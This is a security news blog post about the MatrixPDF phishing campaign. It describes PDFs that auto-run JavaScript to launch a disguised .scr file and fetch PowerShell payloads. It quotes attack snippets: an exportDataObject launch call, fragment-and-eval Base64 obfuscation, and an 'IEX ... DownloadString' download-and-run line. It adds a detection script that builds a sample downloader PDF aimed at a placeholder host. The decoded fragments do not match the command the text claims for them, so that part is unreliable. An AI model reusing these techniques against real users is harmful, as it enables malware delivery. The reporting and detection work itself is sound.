Cyber Web Spider Blog – News

MatrixPDF Attacks Gmail Users Bypassing Email Filters and Fetch Malicious Payload

Posted on October 1, 2025 By CWS

In recent weeks, a novel malware campaign dubbed MatrixPDF has surfaced, targeting Gmail users with carefully crafted emails that slip past conventional spam and phishing filters.

This campaign has been active since mid-September 2025 and leverages PDF attachments that, when opened, initiate a stealthy infection chain designed to exfiltrate sensitive data and deliver additional payloads.

Early indicators suggest that the attackers are exploiting trust in PDF documents by embedding obfuscated scripts and hosting their malicious payloads on legitimate cloud services, which makes detection significantly more difficult.

The initial wave of attacks delivered emails masquerading as internal organizational communications, complete with realistic headers and sender addresses spoofed to resemble trusted corporate domains.

Each email contains a PDF attachment named MatrixDoc.pdf, which appears harmless in preview. However, the PDF is built from malformed objects and carries an embedded JavaScript action that executes automatically when the document is opened in a compatible viewer.

Researchers noted that the JavaScript code employs customized obfuscation techniques, including string concatenation and nonstandard encoding schemes, to evade static analysis.

Varonis analysts identified the MatrixPDF campaign after observing unusual PDF parsing errors across several high-profile enterprise networks.

JavaScript actions in MatrixPDF, including fake prompts and redirect buttons (Source – Varonis)

Examination of the malicious documents revealed that the embedded script uses the util.printf() function to dynamically reconstruct and execute a PowerShell command.

By chaining several decoding routines, the malware ultimately invokes:

this.exportDataObject({cName: "payload.scr", nLaunch: 2});

triggering the execution of a secondary executable disguised as a screensaver file. The PowerShell payload then reaches out to a cloud storage bucket to download additional modules and establish command-and-control communications.

Further analysis uncovered that once the secondary payload is active, it establishes persistence by creating a hidden scheduled task named MatrixUpdater.

This task runs every hour, ensuring that the malware can update itself or fetch new instructions without user intervention. Detection evasion is strengthened through intermittent network connections and randomized task names that change with each infection.

Infection Mechanism

Delving into the infection mechanism, MatrixPDF begins with PDF JavaScript abusing the exportDataObject API to extract and launch the malicious .scr file.

Desktop PDF reader displaying a warning about an external connection (Source – Varonis)

The embedded script reconstructs a Base64-encoded PowerShell command by piecing together several string fragments. A representative snippet is shown below:

// Base64 command split into fragments so no single string matches a signature
var part1 = "ZXh0cmFjdC5GaWxl";
var part2 = "LmQ=";
// Fragments are only joined at runtime, inside the PDF reader's JS engine
var combined = util.stringFromStream(util.createStream({
cData: part1 + part2
}));
eval(combined);

This obfuscation technique ensures that signature-based defenses struggle to flag the script. Once decoded, the command executes:

IEX (New-Object Net.WebClient).DownloadString('

which retrieves and runs a PowerShell script responsible for deploying the main payload. The script also uses the Windows Management Instrumentation (WMI) service to check for existing infections, preventing duplicate installations.

Upon successful download, the PowerShell script writes the payload to %APPDATA%\Local\Matrix\matrix.exe and configures a hidden scheduled task for persistence.
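As an added defender-side example (not code from the article or from Varonis), the following Python triage script looks for the pattern described in this section: an auto-run JavaScript action that reassembles a Base64 PowerShell command from string fragments and calls exportDataObject. It assumes the JavaScript is stored as a plain, uncompressed PDF literal string; the embedded sample PDF and its placeholder URL are constructed for the example.

```python
import base64
import re

JS_INDICATORS = ("exportDataObject", "nLaunch", "util.printf", "createStream", "eval(")  # Acrobat JS calls from the write-up
PS_INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "WebClient")  # downloader markers

def extract_js(pdf: bytes) -> list:
    """Bodies of /JS (...) literal strings; assumes unescaped, uncompressed JS (no FlateDecode)."""
    text = pdf.decode("latin-1")
    bodies = []
    for m in re.finditer(r"/JS\s*\(", text):
        depth, i = 1, m.end()
        while i < len(text) and depth:  # walk to the matching ')' honouring nesting
            depth += {"(": 1, ")": -1}.get(text[i], 0)
            i += 1
        bodies.append(text[m.end():i - 1])
    return bodies

def rebuild_fragments(js: str) -> str:
    """Join `var p = "..."` fragments referenced in a cData: {...} call and Base64-decode the result."""
    frags = dict(re.findall(r'var\s+(\w+)\s*=\s*"([^"]*)"', js))
    decoded = []
    for expr in re.findall(r"cData:\s*([\w\s+]+)\}", js):
        joined = "".join(frags.get(name.strip(), "") for name in expr.split("+"))
        try:
            decoded.append(base64.b64decode(joined, validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid Base64: leave for manual review
            continue
    return "\n".join(decoded)

def triage(pdf: bytes) -> dict:
    """Flag a PDF that auto-runs risky JS, or whose decoded fragments form a PowerShell downloader."""
    js = "\n".join(extract_js(pdf))
    decoded = rebuild_fragments(js)
    hits = [k for k in JS_INDICATORS if k in js]
    ps_hits = [k for k in PS_INDICATORS if k in decoded]
    auto = b"/OpenAction" in pdf
    verdict = "suspicious" if (auto and hits) or ps_hits else "clean"
    return {"auto_open": auto, "js_indicators": hits, "decoded": decoded,
            "powershell_indicators": ps_hits, "verdict": verdict}

def build_sample() -> bytes:
    """Constructed sample (not a real MatrixPDF file): the article's fragment pattern in a minimal PDF."""
    cmd = b"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"  # placeholder URL
    enc = base64.b64encode(cmd).decode()
    js = (f'var part1 = "{enc[:24]}"; var part2 = "{enc[24:]}"; '
          "var combined = util.stringFromStream(util.createStream({cData: part1 + part2})); "
          'eval(combined); this.exportDataObject({cName: "payload.scr", nLaunch: 2});')
    return (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /JavaScript /JS (" + js.encode() + b") >> endobj\n%%EOF\n")
```

Run triage() over a quarantined attachment; a "suspicious" verdict with a decoded downloader string is the cue to block the sender domain and hunt for the MatrixUpdater task on the recipient's host.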

Through its layered approach, MatrixPDF demonstrates a sophisticated blend of social engineering, scripting abuse, and legitimate hosting infrastructure to compromise Gmail users while maintaining a low forensic footprint.

Continuous monitoring and heuristic-based PDF analysis are essential to detect and mitigate this emerging threat.
